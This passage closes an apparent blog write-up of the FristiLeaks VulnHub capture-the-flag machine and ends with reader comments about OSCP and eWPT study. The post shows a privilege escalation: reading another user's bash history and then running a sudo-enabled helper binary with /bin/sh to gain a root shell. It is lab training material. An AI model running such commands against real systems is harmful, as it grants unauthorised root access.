<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmUaJgg5tjDm53bVKnGRc3BSn7Ztr7YDGjPyJV3uwZhPau/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmUaJgg5tjDm53bVKnGRc3BSn7Ztr7YDGjPyJV3uwZhPau/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmUaJgg5tjDm53bVKnGRc3BSn7Ztr7YDGjPyJV3uwZhPau/image.png 2x" /></p>
<p dir="auto">Looking at the bash history reveals what fristigod has been doing.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmZc2eLNoG3JSkAY5Pyg1mGbGRNHVTVZ268t16e5exE9gw/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmZc2eLNoG3JSkAY5Pyg1mGbGRNHVTVZ268t16e5exE9gw/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmZc2eLNoG3JSkAY5Pyg1mGbGRNHVTVZ268t16e5exE9gw/image.png 2x" /></p>
<p dir="auto">So it looks like the command was spammed. The first one looks the most interesting, where doCom runs the ls command.</p>
<p dir="auto">Possibly under the context of root :O</p>
<p dir="auto"><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom whoami</code><br />
<code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmbc3ED6wsS4a9d9bNXwTkjPesontww5sFZBnovCvhiRVy/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmbc3ED6wsS4a9d9bNXwTkjPesontww5sFZBnovCvhiRVy/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmbc3ED6wsS4a9d9bNXwTkjPesontww5sFZBnovCvhiRVy/image.png 2x" /></p>
<p dir="auto">Got root 😎😎😎</p>
<p dir="auto">Time to get the flag.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVwy3kx8RLURXBP8uxva9cQ8JfdhxqVnEBVhHExqZNwUh/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVwy3kx8RLURXBP8uxva9cQ8JfdhxqVnEBVhHExqZNwUh/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVwy3kx8RLURXBP8uxva9cQ8JfdhxqVnEBVhHExqZNwUh/image.png 2x" /></p>
<p dir="auto">Got the flag 🚩</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmQrhw1RA9FLfua11j1Cdkgmmu6pvYLuxyM93Kvt455mQr/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmQrhw1RA9FLfua11j1Cdkgmmu6pvYLuxyM93Kvt455mQr/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmQrhw1RA9FLfua11j1Cdkgmmu6pvYLuxyM93Kvt455mQr/image.png 2x" /></p>
<p dir="auto"><strong>Please follow me <a href="/@shifty0g">@shifty0g</a></strong></p>

I always enjoy a good write up. Good job and thanks for sharing!
I'm currently in the middle of my eWPT exam. I plan on writing a review when I'm done. Currently writing my report. I'm bored of reporting and itching to get back to some vulnhub challenges.

Good luck. I'm building back to OSCP attempt 2. Templates and automation with scripts and aliases have helped me a lot.

Good luck to you as well! I look forward to the OSCP. eCPPT was a lot of fun.
Vulnhub has been my OSCP prep for a long time now lol

This reminds me of when I went to tech school for IT. Unfortunately my life took a different turn and I never went that way, but this would be cool to take on someday. Might take me a few minutes to get back up to speed; who knows, maybe someday.